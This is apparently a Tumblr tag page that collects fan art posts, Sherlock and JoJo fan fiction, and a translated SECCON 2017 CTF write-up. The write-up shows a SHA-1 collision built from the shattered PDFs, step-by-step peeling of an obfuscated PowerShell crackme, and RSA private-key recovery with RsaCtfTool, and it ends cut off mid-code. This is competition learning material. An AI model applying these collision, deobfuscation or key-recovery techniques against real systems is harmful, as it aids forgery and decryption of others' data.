#SECCON
Text

//Another beautiful sleeve art commission from SinScare
These will be used for my SecCon deck then later for the EX6 angels deck.
6 notes
Text
5 seconds into my face reveal and I already got a message from a porn blog
#why do men#girlblog#Update now theres 3#still in the first 10 minutes#tryna strike a chord#and its probably a minor
4 notes
Text
hey u guys wanna see something werid
wghatch him for a seccon d yeah yeah
3 notes
Text
☆ Pinned ☆
since I’m posting here now apparently
[pictured above: me and the tumblrinas in different timezones reblogging the same art on the dash over and over]
About me:
You can call me um ummm uhhhh
I’m an adult
Fixated on JJBA part 5 rn but I have been on this site for a long time in many-a-fandom—none of which are ever truly retired
i dabble in fanart archiving @secconator @bruno-giorno @thedoppiozone very informally on these sideblogs if u have any interest in seeing that
this tumblr was my first blog created but I have at least 3 other main blogs with their own sideblogs so… I come and go like a divorced father visiting several ex families
I’m not “proship” or “anti-anti” or whatever the hell people are saying these days but I may engage in some works that are uncomfortable or problematic to you for various reasons (i.e. soushin, giomis, Rick & Morty) but i also don’t really care to explain why I engage with them. If you see anything on my blogs that upset you, but wish to continue following, feel free to send me a dm or an ask and I will tag those posts accordingly so you can block them
maaaajor tag yapper. not super chatty outside of that
lover of Hope
lover of musics
user of tone tags
Art tags/navigation tags below.
0 notes
Text
First of all this is absolutely amazing and beautiful!
Second, I understand that Mycroft can and likely has some "experience" buuut
I'd love to picture him getting all ready at the Diogenes just to come to a complete stop and start to panic right away as it dawns on him what exactly he had texted and what that means, yes he could picture it and fantasize about it but he actually never had DONE that! And oh god Gregory could be here any minute, that is not enough time to research, what research? His mind will helpfully add. You do know, just only in theory.
Cue one, to Mycroft, dashing looking DI coming in and finding him in this state.
Do You Like Me?
Mycroft Holmes looked at the paper he pulled out of his pocket in utter confusion.
He knew what it was: three-holed, loose-leaf paper. The type of paper every school-aged child was familiar with. He felt an odd sense of nostalgia simply holding the paper with its college-ruled lines. His brain began to swim with deductions:
Carefully halved -its smooth torn edge telling him the person likely used a ruler to do so.
Folded to create a square.
Wrinkled as if having been balled up to be binned but then smoothed out again.
All of that, while its own level of bafflement, was not as dumbfounding as what was written inside.
It's Valentine's Day. I like you. Do you like me? Yes ⬜ No ⬜
It was evident the giver started on this quaint, middle-school note-writing path, realized the ridiculousness of giving him of all people such a thing, and was going to throw it away, but then changed their mind and slipped him the note anyway.
It was unsigned but Mycroft recognized the writing and could hear the voice of its author in his mind.
He has not seen him in nearly a week. How? Why NOW?
Then he recalled a conversation from a year ago.
It was the week of Valentine's Day. He and Gregory Lestrade had met for their monthly Sherlock update, which stopped being about Sherlock long ago. Gregory was recalling how he felt when, as a spotty young teen, he slipped such a note to a girl he liked but forgot to sign it. The girl in question presumed it was from another classmate that she fancied and approached him with it. The classmate, seizing the opportunity, claimed the note was his. By the time Gregory realized what had happened, he was too heartbroken and ashamed to say anything. He had not sent a Valentine again until he was married, and they both knew what happened there. Mycroft was just coming to terms with realizing he had fallen in love with Gregory and convinced himself Gregory would not be interested in him. Thus, kept his feelings to himself. He could not admit then that he would have never made that mistake were Gregory to send him such, and he would have checked off Yes. Instead, Mycroft casually mentioned he had started uni by then. Not that he thought of such things then, but he was much too young for his intellectual peers. And that same intellect had cut him off from what should be his social peers. He had not said the words, but he knew Gregory understood it meant he had never sent nor received such a thing. So, in true Mycroft fashion, he blew the whole conversation off in fierce snark about the sentiment surrounding the time of year and quickly changed the subject.
Now, a year later, Mycroft stared at the paper in his hands.
He was grateful none could see how his heart lurched, for surely he could not hide his wonder.
Here he was, a grown man, a near middle-aged man at that! -receiving his very first Valentine!
For a little piece of paper, it carried a lot of weight. One he never expected to bear.
And it's from Gregory!
The enormity of what it meant! That Gregory, who would never toy with him on such a thing knowing who he is, has done this?
Could it really be that simple? To have everything by answering a Valentine?
The thought utterly gutted Mycroft.
Mycroft was not a man for romantic overtures; he simply was not. Still, he knew he had to do something. There are only two people who could get close enough to him to deliver such and he has not seen his brother in days.
"Anthea?"
"Sir?"
Mycroft held out the note. "Please reverse the travel of today's delivery."
Anthea barely suppressed her smirk as she slipped the note into a pocket without looking at it. "Yes, sir."
Mycroft gave it two hours.
Ninety-three minutes later, his phone buzzed.
TEXT: This is faster. She or whoever was sent is good. I just found it in my pocket. –GL
It was a photo of the original note, now with Mycroft’s response added, plus another text.
It's Valentine's Day. I like you. Do you like me? Yes ✔ No ⬜ It is MORE than like. YES ✔
TEXT: If you could have 24 hours with me and I couldn't say no, what would we be doing? –GL
Mycroft nearly dropped his phone as far too many visuals, clean and… otherwise, suddenly crashed in his mind.
It was heady to realize what he once never dared to dream could be on the verge of becoming reality.
TEXT: Be my Valentine and find out. I’m at Diogenes. The clock will begin upon arrival. Come and kiss me. –MH
TEXT: I’ll be there in an hour, depending on traffic. –GL
“Anthea?”
“Shall I clear your schedules for today, Sir?”
Mycroft could not find it in him to even pretend annoyance at her presumptuousness; she was his aide-de-camp for a reason.
“Today and tomorrow,” he looked at his phone, “Actually -hold that thought…”
Emboldened, Mycroft sent another text.
TEXT: Can you be enticed to double the time if you’ll allow me to reverse the order? –MH
He mentally grinned at the thought of Gregory's face upon reading it.
TEXT: Consider me enticed. I’ll be there in LESS than an hour! –GL
Mycroft’s eyes playfully narrowed on a smug-looking Anthea. “Make that today, tomorrow, and the day after.”
“Of course, sir.”
=========================
Read/Comment on AO3
@flashfictionfridayofficial @mystradepromptsandscenarios @fluffbruary
79 notes
Text
Thoughts from LinkedIn - 11
Image from unsplash.com, by William Felipe Seccon. On silence and speaking. At the start of life we are taught to walk and talk, but then we are sent to school, where we are required to sit and be silent. Then (if you are lucky with your university) you again have to walk and talk. Then, in an entry-level position, you sit and are silent again. Then you are not quite forty, you are supposedly an expert, and you are asked to speak again, but not so much anymore…
#knowledge base#buffett#windows#appearance#google#investments#probation#career#copyright#space#license#mentoring#payment#error#subscription#prevention#service#dogs#court#expert#language
0 notes
Text
i got up from my chair and my leg just decided not to work? it wasnt even like i had low iron levels or something like that it just flat out could not support anything so cut to me laying on the ground really confused as to just what happened
4 notes
Text
self indulgence, pt 20
a/n: heres my first ever finished series!! fuck this has been a ride, but im glad to have done it with all of you.
warnings: weddings, crying, pregnancy mentions
The planning for your wedding passed in a blur. It would be in Sicily, in Risotto’s hometown, and in the church he had gone to growing up. His family thought he was dead, and he knew it was best to keep it that way.
Your honeymoon would be in Malta, and it would be only a week. Risotto didn’t trust his subordinates to run the newly fledging organization for longer than that.
An increasingly obvious problem was Secco. The man had grown more and more attached to you as the days went on, and he now had a hard time being separated from you. He did wear clothes now, usually shorts and a loose t shirt, but he still had the unfortunate habit of coming to you when he was horny.
Secco was a unique issue, and one you needed to confront. He was a grown man who acted like a particularly obedient pet, who clearly had issues that couldn’t be resolved easily, and who was a very powerful and loyal Stand user.
Risotto would rather Secco remained attached to you than have to kill him, but he’d made it clear in no uncertain terms that Secco was not to come on the honeymoon. You agreed. You’d have to find someone who liked him.
Your solution came when you were trying to order the invitations. Your computer kicked the bucket just as you were finishing. Fortunately, Melone was in town, and he agreed to come over and help. The moment he stepped in the door, Secco was on him like an overeager dog. Melone frowned. “And who’s this?”
You sighed. “Secco, stop! He’s Cioccolata’s former human pet. I transferred his loyalties.”
Melone swallowed. “Your Stand is very…interesting.”
You laughed. “You can say scary.”
He shrugged and leaned down to pat Secco’s head. “He’s very cute.”
Secco purred and looked pleased. “Thank you!”
Melone jumped. “Oh, you talk!”
Secco’s voice was less garbled now, since you’d worked with him on speech. Melone knelt and looked at Secco. “Do you like it here?”
Secco grinned. “I love it here. Y/N and Risotto aren’t mean to me, and they aren’t weak like Cioccolata was. And Y/N is so pretty-”
He blushed and looked down. Melone chuckled softly and stood. “He’s an interesting project, to say the least.”
You sighed. “Yeah. My issue is that he can’t exactly come on the honeymoon with us.”
Melone shrugged. “I’ll keep him.”
You blinked. “Really?”
He raised an eyebrow. “A human pet? I’d love to talk more with him.”
You shrugged. “Secco, do you want to go with Melone for a week?”
Secco grinned. “He seems nice! Yeah.”
You shrugged again. “Okay, well, he’ll take you to his apartment after he’s done here, so go and get your things.”
Secco bounded into your room. You sat next to Melone on the couch, and he pulled up a mockup of your wedding invitations. “I knew something like this would happen, so I saved duplicates of everything on Babyface.”
You hugged him. “Thank you so much.”
He shrugged and hit a few keys, sending them to the company you were getting them from. “It’s not a problem.”
He hugged you back and smiled. “I’m happy you and Risotto are finally tying the knot.”
You pulled away and smiled back. “I am too.”
He stood, and Secco came out of your room, holding his bag. It had his changes of clothes and his toiletries, both of which you had gotten for him. Getting him to take a bath at first had been hell, but he’d eventually grown to like it.
Melone took his hand. “I’ll take good care of him, Y/N.”
You smiled and knelt to kiss Secco’s forehead. “Be good for Melone.”
He hugged you tight and nodded. “I will.”
You hugged him back, then let go and stood. Melone nodded to you and led Secco out the door. Secco was walking normally, although it was a little bowlegged.
You sat back down at your desk, glad that at least one of the knots in your life had been untangled.
Risotto came home late, looking tired. You were on the couch, typing on your laptop. When you saw him, you put it down and reached out. He pulled off his tie and fell onto your lap, groaning. “They’re so fucking stupid.”
You stroked his hair gently. “What happened?”
He shook his head. “They’ll never survive without me.”
He turned over and looked up at you. “They’re barely making it without you. With both of us gone, this whole operation might just go under.”
You sighed. “Prosciutto?”
Risotto bit his lip. “Has his hands full containing the leak. Formaggio would be able to hold it down for a few days, and with Illuso, probably a full week.”
You shrugged. “So we have some extra work at the end of the day. Not a bad thing.”
He shrugged back and stayed quiet. You kept scratching his hair, and he hummed. You smiled. “Do you want to watch a movie?”
He nodded, yawning again. You patted his head. “Go put on pajamas. You’ll wrinkle your suit.”
He rolled his eyes, and got up. “The suit isn’t even that expensive-”
You shook your head. “I like it, I don’t want it to get wrinkled.”
He stuck his tongue out playfully, and you smiled.
You turned on the TV while he changed. You glanced into your shared room. He was down to his briefs, stretching out tired muscles. He smiled at you, and you smiled back. He pulled on a baggy tshirt and came out. “Hey.”
You held out your arms, and he laid down on you. His feet were hanging off the end of the couch, but he didn’t care.
The day of your wedding came faster than you’d expected. Risotto had stayed over at Formaggio’s place the night before, so tradition could be kept. A team of Passione aestheticians had come over early in the morning and made you up and laced you into the dress. You sat in a chair and looked at yourself as they contoured and colored your face. The makeup was soft. You swallowed the nervousness in your throat. You were the queen, and they knew it. What had you done to get there? What would you do to stay there?
The church you were getting married in was massive. All of Passione was in attendance for the ceremony, but only a select few would be present for the reception, mostly the former members of La Squadra di Esecuzione and their new spouses or underlings. Bruno’s squad would be there as well, even Mista. Risotto had refused to budge on ordering him to attend. The final nail in his coffin, watching the woman you love become inaccessible forever.
You were prepared to walk down the aisle alone. But when Prosciutto met you at the door and offered his arm, you were grateful. He kissed your cheek gently. “You look beautiful.”
You smiled at him. “Thank you.”
He nodded. “I know I have to give you away to him.”
You touched his cheek. Your heels made you taller than him. “We’re friends.”
He closed his eyes. “Yes.”
The music started, and the doors opened.
The church was beautiful, festooned in lace and white roses. The sun shone through green, white and blue stained glass, and the ceiling was high and airy. Your train trailed behind you as you walked down the aisle with Prosciutto.
Risotto was standing at the altar, looking angry as usual. His tuxedo was black from the skin out. The only break was his white tie. He turned to you, and his facade broke.
His face crumpled, and he covered his face as he began to cry. You rushed the last few steps and took his wrists. “Ris, what-?”
The church was stunned. Nobody had ever seen him cry before. He pulled his hands away from his face and wiped away his tears. “Fuck. You’re beautiful. I never thought-”
You smiled weakly. “If you cry, I’ll cry. Quit it.”
He nodded and inhaled deeply. His black sclera never revealed that he’d been crying. The priest cleared his throat. “Are we ready?”
You nodded and took Risotto’s hands. The priest began. “Dearly beloved-”
You zoned out and watched Risotto’s face. He was smiling at you. He looked utterly content. You both repeated after the priest, and after your “I do’s”, he stepped back. “The couple will now state their vows to one another before God.”
Risotto swallowed hard and pulled out a stack of notecards. He blinked and looked at you. “Y/N. You are the woman I love. When I found you, I hoped against hope that someday we would be here, and I, against all odds, and all evidence to the contrary, have finally gotten something I want. Someone I want. You have risked your life to get us where we are now, but that stops here. I will keep you safe. I will make a home for you, wherever that may be.”
He swallowed hard and continued. “As I stand here, under the eyes of God and Passione, I know that I chose right. I chose you, and I will keep choosing you.”
You sniffled, and Prosciutto at your elbow handed you a handkerchief. You took Risotto’s hands. “Risotto Nero, you have been the only constant in my life for a long time. I have loved you for longer than I know, and I feel blessed every day that I’m by your side. You make me laugh and cry, rage and smile. I have risked my life for yours, as you do for mine. I would do it again in a heartbeat. You are the only man I would do this for. I chose you. I will keep choosing you.”
The priest spoke softly, but the whole church heard it. “You may now kiss the bride.”
Risotto’s lips were on yours before the priest finished his sentence. You could taste salt and blood, tears and iron. His lips were crushing and desperate, his hands pulling you in close to him passionately.
He pulled back, panting softly, and you smiled at him. “You have lipstick marks.”
He laughed and pulled away, taking your hand in his and facing the church. The priest announced, “I present to you today, under God for the first time, Mr. and Mrs. Risotto Nero.”
Epilogue.
Of course it didn’t end there. Risotto rose in power and fame, eventually controlling all of Italy in his web of organized crime. He became known as “L’uomo Nero”, fitting both because of his last name and his fashion sense, as well as his sadistic taste in punishment. He was feared and respected. He never allowed anyone else to dole out punishment, and ruled with an iron fist.
Your powers, as soft as they seemed, were more feared among the organization. Rumors of you making men fall in love with a touch, then leading them into the jaws of L’uomo Nero, circulated long after you both retired.
When Risotto turned 35, he decided he’d had enough. You retired with him to a small villa on a hill in Sicily, overlooking the beach. You stopped taking birth control, and were pregnant with twins within the year. They were born as white-haired as their father. Risotto doted on them, and on you.
You found him one day staring into the mirror at his body. When you had met him, ten years ago now, he had been slim and tall, like a tree. As he neared middle age, his body had thickened and gained muscle and fat. His belly stuck out over his shorts, and body hair had thickened on his chest and stomach. He’d raised an eyebrow at you, and you’d kissed him. He’d sighed. “I’m not the same man you married.”
You’d laughed. “I’m not the same woman. Does that mean we give up? Does that mean I don’t love you every day?”
He smiled and kissed you again. “No. It doesn’t.”
You were pregnant again the next year. Risotto’s love for you grew as his children did, and when you became pregnant again with twins, he decided it was time for a vasectomy. You agreed.
You grew old together, watching your children play in the waves.
#jojo#my writing#jojos bizarre adventure#sfw#jojo's bizarre adventure#series#jojo kimyou na bouken#self indulgence#risotto#risotto x reader#risotto nero#risotto nero x reader#vento aureo#golden wind#fixit fic#prosciutto#la squadra#secco#melone#uhh so yeah secco x melone is a heavy implied thing ehre and yes it does happen#im emo tho i didnt expect to get this far
109 notes
Text
SECCON 2017 Online
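The SECCON online qualifier ran for 24 hours over 12/9-10. Apparently a total of 1028 teams took part, including teams from overseas. The result was 53rd place. That is 12th among the domestic teams, so it looks like we can advance to the domestic finals held in February.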
putchar music - Programming 100
The problem statement is as follows.
This one line of C program works on Linux Desktop. What is this movie's title? Please answer the flag as SECCON{MOVIES_TITLE}, replace all alphabets with capital letters, and spaces with underscores.
main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}
Compile the given source. Add the include statements and compile with the -lm option.
#include #include
main(t,i,j){unsigned char p[]="###>5|(int)(t*x));}}
$ gcc a.c -lm
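When run, a large amount of data streams out on standard output. Playing it back gives the movie's music. Whether it makes sound or not seems to depend on the PC environment?
$ a.out | aplay
再生中 raw データ 'stdin' : Unsigned 8 bit, レート 8000 Hz, モノラル
The flag is SECCON{STAR_WARS}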
SHA-1 is dead - Crypto 100
The problem statement is as follows.
SHA-1 is dead
http://sha1.pwn.seccon.jp/ Upload two files satisfy following conditions:
file1 != file2 SHA1(file1) == SHA1(file2) SHA256(file1) SHA256(file2) 2017KiB 2017KiB
1KiB = 1024 bytes
It looks like we need to create two files whose SHA1 collides. Speaking of SHA1, this is the case that made news when files with colliding hashes were actually generated.
https://shattered.io/
Files with colliding SHA1 already exist, so all that remains is to satisfy the file size condition. From how the hash value is computed, if the same data is appended to two files with the same hash value, the hashes of the files after appending should match again. Download the two colliding PDF files from the site above.
-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf
-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf
We want a file larger than 2017KiB and smaller than 2018KiB, so calculate the size.
422435 bytes / 1024 = 412 KiB (size of the shattered.io PDF files)
2017 KiB - 412 KiB = 1605 KiB (size of the data to append)
Then just append suitable dummy data to the PDFs.
$ python -c "print '\xff'*1024*1605" > ff
$ cat shattered-1.pdf ff > 1.pdf
$ cat shattered-2.pdf ff > 2.pdf
$ ls -lrt
合計 6468
-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-1.pdf
-rwxrwxrwx 1 root root 422435 12月 9 17:12 shattered-2.pdf
-rwxrwxrwx 1 root root 1643521 12月 9 17:24 ff
-rwxrwxrwx 1 root root 2065956 12月 9 17:24 1.pdf
-rwxrwxrwx 1 root root 2065956 12月 9 17:25 2.pdf
$ sha1sum 1.pdf 2.pdf
82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 1.pdf
82a7ab1ec5d028f3956b6fe92c8ed594bfb41d92 2.pdf
$ sha256sum 1.pdf 2.pdf
f240399f72872cccc4e24fd91431bc604b5668cf7ba7e6a1ee35ad58edd43f40 1.pdf
89873267dd5f3da340e1304409aecfc1bcbd89e5428192834f6f1cc7a6902a11 2.pdf
We obtained two files whose SHA1 collides. Submit them to the challenge site and done. The flag is SECCON{SHA-1_1995-2017?}
Powerful_Shell - Binary 300
The problem statement is as follows.
Crack me. powerful_shell.ps1-1fb3af91eafdbebf3b3efa3b84fcc10cfca21ab53db15c98797b500c739b0024
The given file looks like this. An obfuscated PowerShell script?
$ECCON=""; $ECCON+=[char](3783/291); $ECCON+=[char](6690/669); $ECCON+=[char](776-740); $ECCON+=[char](381-312); $ECCON+=[char](403-289); $ECCON+=[char](-301+415); $ECCON+=[char](143-32); $ECCON+=[char](93594/821); $ECCON+=[char](626-561); $ECCON+=[char](86427/873); $ECCON+=[char](112752/972); $ECCON+=[char](43680/416); $ECCON+=[char](95127/857);
(omitted)
$ECCON+=[char](873-863); $ECCON+=[char](721-708); $ECCON+=[char](803-793); $ECCON+=[char](10426/802); Write-Progress -Activity "Extracting Script" -status "20040" -percentComplete 99; $ECCON+=[char](520-510); Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))
By default on Windows, script execution is restricted by policy. First, to make the script runnable, start PowerShell with administrator privileges and run the following command.
PS C:\work> Set-ExecutionPolicy RemoteSigned
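Running the script displays the SECCON image, but it seems to exit on some kind of check.
Obfuscated or not, it is still just a script, so I figured it must be doing something eval-like near the end. I looked for a likely spot and tried outputting the code in its decoded, easier-to-read state (assuming there would be one).
Change the last line to write to a file
(Before) Write-Progress -Completed -Activity "Extracting Script";.([ScriptBlock]::Create($ECCON))
(After) Write-Progress -Completed -Activity "Extracting Script";[ScriptBlock]::Create($ECCON)|Out-File -FilePath C:\work\output.ps1 -Encoding Ascii
Running it again yields the decoded script. Incidentally, this script is set up to exit when it detects execution under a debugger.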
PS C:\work> .\powerful_shell.ps1
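That said, it is still obfuscated. There are syntax errors, so it can be run after slightly fixing the line-break codes. Also, it checks the execution environment during processing, so skipping that part and running it brings up a piano keyboard. Apparently it actually plays sound too? (It did not play properly in my environment.)
In the latter half of the processing, it XOR-decrypts data using a key generated from the correct key input (the piano performance).
(omitted)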
$text=@" YkwRUxVXQ05DQ1NOE1sVVU4TUxdTThBBFVdDTUwTURVTThMqFldDQUwdUxVRTBNEFVdAQUwRUxtT TBEzFVdDQU8RUxdTbEwTNxVVQUNOEFEVUUwdQBVXQ0NOE1EWUUwRQRtVQ0FME1EVUU8RThdVTUNM EVMVUUwRFxdVQUNCE1MXU2JOE0gWV0oxSk1KTEIoExdBSDBOE0MVO0NKTkAoERVDSTFKThNNFUwR FBVINUFJTkAqExtBSjFKTBEoF08RVRdKO0NKTldKMUwRQBc1QUo7SlNgTBNRFVdJSEZCSkJAKBEV QUgzSE8RQxdMHTMVSDVDSExCKxEVQ0o9SkwRQxVOE0IWSDVBSkJAKBEVQUgzThBXFTdDRExAKhMV Q0oxTxEzFzVNSkxVSjNOE0EWN0NITE4oExdBSjFMEUUXNUNTbEwTURVVSExCKxEVQ0o9SkwRQxVO EzEWSDVBSkJAKBEVQUgzThAxFTdDREwTURVKMUpOECoVThNPFUo3U0pOE0gWThNEFUITQBdDTBFK F08RQBdMHRQVQUwTSBVOEEIVThNPFUNOE0oXTBFDF0wRQRtDTBFKFU4TQxZOExYVTUwTSBVMEUEX TxFOF0NCE0oXTBNCFU4QQRVBTB1KFU4TThdMESsXQ04TRBVMEUMVThNXFk4TQRVNTBNIFUwRFBdP
(omitted)
E0QVTUwTSBVMEUYXTxFAF0NCE0oXTBNCFU4QFhVBTB1KFU4TQBdMEUIXQ04TRBVMEUAVThNDFkFM EUobTBNDFUwRFBdAThNIFUITQRdME0wVQU8RShdMHUMVThMoF0wRNhdDThNEFUwRRhVOEzEWQUwR ShtME0EVTBFGF0BOE0gVQhNDF0wTVxVBTxFKF0wdQxVOEygXTBE2FxROE10VShZOTBFTF2E= "@
$plain=@()
$byteString = [System.Convert]::FromBase64String($text)
$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {
    for ($j = 0; $j -lt $f.length; $j++) {
        $plain+=$byteString[$i] -bxor $f[$j]
        $i++
        if ($i -ge $byteString.Length) {
            $j = $f.length
        }
    }
})
iex([System.Text.Encoding]::ASCII.GetString($plain))
Read the part of the code that checks the keystroke input and identify the key.
$f="hhjhhjhjkjhjhf"
Then, modify the script so that the decrypted data is written to a file, and run it.
(Before) iex([System.Text.Encoding]::ASCII.GetString($plain))
(After) [System.Text.Encoding]::ASCII.GetString($plain)|Out-File -FilePath C:\work\output3.ps1 -Encoding Ascii
The decrypted script obtained this way is still obfuscated... The variable names are symbols, which makes it confusing.
${;}=+$();${=}=${;};${+}=++${;};${@}=++${;};${.}=++${;};${[}=++${;}; ${]}=++${;};${(}=++${;};${)}=++${;};${&}=++${;};${|}=++${;}; ${"}="["+"$(@{})"[${)}]+"$(@{})"["${}${|}"]"$(@{})"["${@}\({}"]+"\)?"[${+}]+"]"; ${;}"".("$(@{})"["${}${[}"]"$(@{})"["${}${(}"]"$(@{})"[${}]+"$(@{})"[${[}]+"$?"[${+}]+"$(@{})"[${.}]); ${;}"$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (omitted)
Again focus on the last line and output the decoded script.
(Before) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"];"${"}${.}${(}+${"}${ (omitted)
(After) ${;}="$(@{})"["${}${[}"]"$(@{})"[${[}]+"${;}"["${@}${)}"]; Write-Host "${"}${.}${(}+\({"}\)
Here is the output. Obfuscated yet again.
[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]61+[CHar]82+[CHar]101+[CHar]97+[CHar]100+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]45+[CHar]80+[CHar]114+[CHar]111+[CHar]109+[CHar]112+[CHar]116+[CHar]32+[CHar]39+[CHar]69+[CHar]110+[CHar]116+[CHar]101+[CHar]114+[CHar]32+[CHar]116+[CHar]104+[CHar]101+[CHar]32+[CHar]112+[CHar]97+[CHar]115+[CHar]115+[CHar]119+[CHar]111+[CHar]114+[CHar]100+[CHar]39+[CHar]13+[CHar]10+[CHar]73+[CHar]102+[CHar]40+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]32+[CHar]45+[CHar]101+[CHar]113+[CHar]32+[CHar]39+[CHar]80+[CHar]48+[CHar]119+[CHar]69+[CHar]114+[CHar]36+[CHar]72+[CHar]51+[CHar]49+[CHar]49+[CHar]39+[CHar]41+[CHar]123+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]39+[CHar]71+[CHar]111+[CHar]111+[CHar]100+[CHar]32+[CHar]74+[CHar]111+[CHar]98+[CHar]33+[CHar]39+[CHar]59+[CHar]13+[CHar]10+[CHar]9+[CHar]87+[CHar]114+[CHar]105+[CHar]116+[CHar]101+[CHar]45+[CHar]72+[CHar]111+[CHar]115+[CHar]116+[CHar]32+[CHar]34+[CHar]83+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]123+[CHar]36+[CHar]69+[CHar]67+[CHar]67+[CHar]79+[CHar]78+[CHar]125+[CHar]34+[CHar]13+[CHar]10+[CHar]125|iex
Once more, change the final part so that it outputs the deobfuscated script.
Here is the result obtained by running it. Finally at the goal!
$ECCON=Read-Host -Prompt 'Enter the password'
If($ECCON -eq 'P0wEr$H311'){
	Write-Host 'Good Job!';
	Write-Host "SECCON{$ECCON}"
}
The flag is SECCON{P0wEr$H311}
Ps and Qs - Crypto 200
The problem statement is as follows.
Decrypt it. psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip (pass:seccon2017)
The contents of the given Zip file are a ciphertext and two public keys.
Archive: psqs1-0dd2921c9fbdb738e51639801f64164dd144d0771011a1dc3d55da6fbcb0fa02.zip
  Length     Date   Time    Name
 --------    ----   ----    ----
      512  12-09-17 01:33   cipher
      800  12-09-17 01:33   pub1.pub
      800  12-09-17 01:33   pub2.pub
$ openssl rsa -in pub1.pub -text -pubin
Public-Key: (4096 bit)
Modulus:
    00:cf:cf:bb:ee:a7:df:14:3a:8a:c2:08:b1:aa:1d:
    2f:86:54:5a:c4:cb:58:8c:94:a3:fb:1c:14:ad:91:
    a4:f0:b9:36:15:7c:5a:4b:86:9c:18:a8:b8:64:f4:
(omitted)
$ openssl rsa -in pub2.pub -text -pubin
Public-Key: (4096 bit)
Modulus:
    00:bb:33:cc:7f:cc:8e:ca:f3:bf:9e:d9:5c:58:37:
    92:e1:ec:6b:80:ee:87:5e:c2:06:4d:bc:f0:75:95:
    c8:34:49:23:bf:53:65:24:d4:e0:a7:55:74:c7:79:
(omitted)
It bothers me that two public keys are deliberately provided for a single ciphertext. While looking into it with that in mind, I came across this.
https://github.com/Ganapati/RsaCtfTool
RsaCtfTool RSA tool for ctf - uncipher data from weak public key and try to recover private key Automatic selection of best attack for the given public key
Finished in an instant, lucky.
$ ~/RsaCtfTool/RsaCtfTool.py --publickey "*.pub" --private > private
$ openssl rsautl -decrypt -inkey private -in cipher -out plain.txt
$ cat plain.txt
SECCON{1234567890ABCDEF}
The flag is SECCON{1234567890ABCDEF}
JPEG file - Binary 100
The problem statement is as follows.
Read this JPEG is broken. It will be fixed if you change somewhere by 1 bit.
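It says the file is broken, so presumably the flag will be displayed once it is repaired.
I just found some tool that claims to repair JPEGs and ran it. Since it would be a problem if the tool were sketchy, I took a snapshot before running the tool and reverted afterwards. Virtual machines are handy at times like this.
It was a lot of fun. SECCON is an important event that I look forward to every year and make sure never to miss. I'm also happy that we made it through the qualifier. Thanks to the organizers, my teammates, and all the various people around me. Thank you very much.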
0 notes
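The reasoning in the "SHA-1 is dead" write-up above (two files with the same hash still match after the same data is appended) follows from the Merkle-Damgård construction, and it relies on the two inputs having equal length and the same internal state at a block boundary. This added example, not code from the original post, shows that on a toy hash with a 24-bit state (`toy_hash`, `compress` and the 16-byte block size are assumptions made here so that a collision is found in milliseconds); it also shows that a common prefix does not preserve the collision.

```python
import hashlib
import struct

BLOCK = 16              # toy block size in bytes (SHA-1 uses 64)
IV = b"\x01\x23\x45"    # 24-bit chaining value, small enough to collide quickly


def compress(state, block):
    """Toy compression function: truncated SHA-256 of state || block."""
    return hashlib.sha256(state + block).digest()[:len(IV)]


def padding(msg_len):
    """Merkle-Damgard strengthening: 0x80, zero fill, 64-bit bit length."""
    zeros = (-(msg_len + 1 + 8)) % BLOCK
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", msg_len * 8)


def toy_hash(msg):
    """Iterate the compression function over the padded message."""
    data = msg + padding(len(msg))
    state = IV
    for off in range(0, len(data), BLOCK):
        state = compress(state, data[off:off + BLOCK])
    return state.hex()


def find_colliding_blocks():
    """Birthday search: two distinct blocks with the same chaining value."""
    seen = {}
    counter = 0
    while True:
        block = struct.pack(">QQ", 0, counter)
        cv = compress(IV, block)
        if cv in seen:
            return seen[cv], block
        seen[cv] = block
        counter += 1


def demo():
    a, b = find_colliding_blocks()
    suffix = b"\xff" * (1024 * 1605)   # same filler size the write-up appends
    prefix = b"\x00" * BLOCK           # constructed prefix for the counter-case
    return {
        "distinct": a != b,
        "same_size": len(a + suffix) == len(b + suffix),
        # Same state after the colliding block, same length, hence same digest.
        "collide": toy_hash(a) == toy_hash(b),
        # Every later block is identical, so the states stay identical.
        "collide_after_suffix": toy_hash(a + suffix) == toy_hash(b + suffix),
        # A prefix changes the state fed into the colliding blocks.
        "collide_after_prefix": toy_hash(prefix + a) == toy_hash(prefix + b),
        # An independent hash still tells the two inputs apart.
        "sha256_differs": hashlib.sha256(a + suffix).digest()
                          != hashlib.sha256(b + suffix).digest(),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `sha256_differs` result is the defensive takeaway: checking a second, unbroken hash is what distinguishes the two files, as the challenge's own SHA256 condition does.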
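The three layers in the Powerful_Shell write-up above can also be peeled without executing the script, which is how an analyst would handle an untrusted sample. This added example, not code from the original post, decodes the opening terms of each layer as copied from the write-up; the function names are assumptions made here, and only integer arithmetic is evaluated.

```python
import base64
import re

# Samples copied from the write-up above; each is only the start of its layer.
LAYER1 = (  # first 13 terms of powerful_shell.ps1 plus its final invocation
    "$ECCON+=[char](3783/291); $ECCON+=[char](6690/669); "
    "$ECCON+=[char](776-740); $ECCON+=[char](381-312); "
    "$ECCON+=[char](403-289); $ECCON+=[char](-301+415); "
    "$ECCON+=[char](143-32); $ECCON+=[char](93594/821); "
    "$ECCON+=[char](626-561); $ECCON+=[char](86427/873); "
    "$ECCON+=[char](112752/972); $ECCON+=[char](43680/416); "
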